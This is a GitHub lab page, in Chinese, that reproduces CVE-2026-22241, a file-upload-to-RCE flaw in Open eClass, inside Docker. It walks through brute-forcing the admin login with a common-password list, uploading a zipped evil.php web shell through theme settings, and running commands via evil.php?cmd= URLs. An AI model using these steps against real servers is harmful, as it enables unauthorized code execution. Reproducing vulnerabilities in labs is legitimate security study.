CVEs-Labs/CVE-2026-22241

GitHub: CVEs-Labs/CVE-2026-22241

针对 Open eClass 平台文件上传漏洞 CVE-2026-22241 的 Docker 实验环境,复现从恶意文件上传到远程代码执行的完整攻击过程。

Stars: 0 | Forks: 0

# CVE-2026-22241 CVE-2026-22241 漏洞环境 # 漏洞描述: - 漏洞类型:危险类型文件的不受限制上传。 - 影响:远程代码执行 (RCE)。 - 描述:该漏洞允许具有管理权限的攻击者上传恶意 PHP 文件 (Web Shell),从而导致 Web 服务器的完整性和安全性完全受损。 - 目标系统:OpenClass 教育基础设施。 # 1. 搭建环境 git clone https://github.com/CVEs-Labs/CVE-2026-22241.git 打开 https://www.openeclass.org/en/previous-versions/ 并下载 openeclass-4.0.1.zip sudo apt update && sudo apt install docker.io docker-compose -y sudo systemctl start docker mkdir eclass-lab mv /home/Red101/Downloads/openeclass-4.0.1.zip eclass-lab cd eclass-lab zip poc.zip evil.php mkdir html unzip openeclass-4.0.1.zip -d ./html cd ~/eclass-lab/html mv openeclass-4.0.1/* . mv openeclass-4.0.1/.* . 2>/dev/null rmdir openeclass-4.0.1 cd .. sudo chown -R 33:33 html/ sudo chmod -R 777 html/ sudo chown -R $USER:$USER html/ sudo docker-compose up -d sudo docker exec -it eclass-web bash -c "apt-get update && apt-get install -y libpng-dev libzip-dev libicu-dev libxml2-dev libldap2-dev && docker-php-ext-configure ldap --with-libdir=lib/x86_64-linux-gnu/ && docker-php-ext-install zip gd pdo pdo_mysql intl soap ldap && apache2ctl restart" sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' eclass-web http://ip-docker 在 eclass 页面中: 主机 (Host): db 数据库: eclass 用户: root 密码 (Password): rootpassword # 2. 利用漏洞: nmap -sV ip-docker 用于 ZAP 密钥列表: https://gitlab.com/kalilinux/packages/seclists/-/blob/kali/master/Passwords/Common-Credentials/Pwdb_top-1000.txt 在 eclass 页面中: 前往 管理员工具 -> 主题设置 -> 然后上传 poc.zip 在新页面中: http://172.19.0.3/courses/theme_data/evil.php?cmd=whoami http://172.19.0.3/courses/theme_data/evil.php?cmd=uname%20-a http://172.19.0.3/courses/theme_data/evil.php?cmd=id
标签:CISA项目, CVE-2026-22241, Docker, ffuf, OpenClass, Open eClass, OpenVAS, PE 加载器, PHP, RCE, Web Shell, 任意文件上传, 协议分析, 安全防御评估, 文件上传漏洞, 权限提升, 漏洞复现, 版权保护, 编程工具, 网络安全, 请求拦截, 远程代码执行, 隐私保护, 靶场环境, 高危漏洞